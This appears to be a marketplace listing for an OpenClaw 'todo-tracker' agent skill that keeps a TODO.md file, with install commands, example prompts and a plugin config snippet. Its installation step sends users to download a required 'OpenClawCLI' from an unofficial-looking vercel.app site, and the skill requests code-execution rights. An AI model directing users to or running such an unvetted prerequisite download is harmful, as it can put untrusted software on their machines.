todo-tracker
Persistent TODO scratch pad for tracking tasks across sessions. Use when user says "add to TODO", "what's on the TODO", "mark X done", "show TODO list", "remove from TODO", or asks about pending tasks. Also triggers on heartbeat to remind about stale items.
Why use this skill?
Efficiently manage tasks and project reminders with the todo-tracker skill for OpenClaw. Track high-priority items and clear stale tasks easily.
Install via CLI (Recommended)
clawhub install openclaw/skills/skills/thiagoruss0/todo-tracker1What This Skill Does
The todo-tracker skill acts as a persistent memory layer for your OpenClaw agent, maintaining a structured TODO.md file directly in your workspace root. Unlike transient chat memory, this skill ensures that tasks, reminders, and project requirements are tracked across long-term sessions. It manages task prioritization, tracks completion status, and performs automated health checks to identify stale items, ensuring that important project goals do not fall through the cracks over time.
Installation
⚠️ OpenClawCLI must be installed before using this skill.
- Ensure you have the OpenClawCLI installed from https://openclawcli.vercel.app/.
- Open your terminal in the workspace directory.
- Run the installation command:
clawhub install openclaw/skills/skills/thiagoruss0/todo-tracker1
Use Cases
This skill is designed for developers and power users who need to bridge the gap between AI conversation and project execution. Use it to keep track of technical bugs, pending refactors, or documentation updates. It is particularly useful for managing long-term projects where context is often lost between chat sessions, allowing the agent to provide timely reminders based on your predefined priority levels (high, medium, low).
Example Prompts
- "Add high priority task: Refactor the authentication middleware to support OIDC before Friday."
- "What is currently on my TODO list? I want to see if I have anything stale that I can remove."
- "Mark 'Ingest low-code docs' as done and show me my remaining tasks."
Tips & Limitations
- Stale Item Management: The skill automatically marks items older than 7 days as stale in the summary. Review these regularly to keep your workspace clean.
- File Integrity: The todo-tracker relies on the
TODO.mdfile in your workspace root. Avoid manually renaming or deleting this file outside of the skill's commands to prevent sync issues. - Pattern Matching: The 'done' and 'remove' commands use partial string matching. Use specific keywords to ensure you are modifying the correct entry.
Metadata
Not sure this is the right skill?
Describe what you want to build — we'll match you to the best skill from 16,000+ options.
Find the right skillPaste this into your clawhub.json to enable this plugin.
{
"plugins": {
"official-thiagoruss0-todo-tracker1": {
"enabled": true,
"auto_update": true
}
}
}Tags(AI)
Flags: file-read, file-write, code-execution
Related Skills
n8n
Manage n8n workflows and automations via API. Use when working with n8n workflows, executions, or automation tasks - listing workflows, activating/deactivating, checking execution status, manually triggering workflows, or debugging automation issues.
Read WeChat local data from SQLite databases. Supports listing contacts, chat sessions, searching messages, and viewing favorites. Use when the user needs to access their own WeChat data stored locally. Requires access to WeChat data directory. Read-only operations only.
coding-agent
Run Codex CLI, Claude Code, OpenCode, or Pi Coding Agent via background process for programmatic control.
veo3-gen
Generate and stitch short videos via Google Veo 3.x using the Gemini API (google-genai). Use when you need to create video clips from prompts (ads, UGC-style clips, product demos) and want a reproducible CLI workflow (generate, poll, download MP4, optionally stitch multiple segments).
jira
Jira API integration with managed OAuth. Search issues with JQL, create and update issues, manage projects and transitions. Use this skill when users want to interact with Jira issues, projects, or workflows. For other third party apps, use the api-gateway skill (https://clawhub.ai/byungkyu/api-gateway).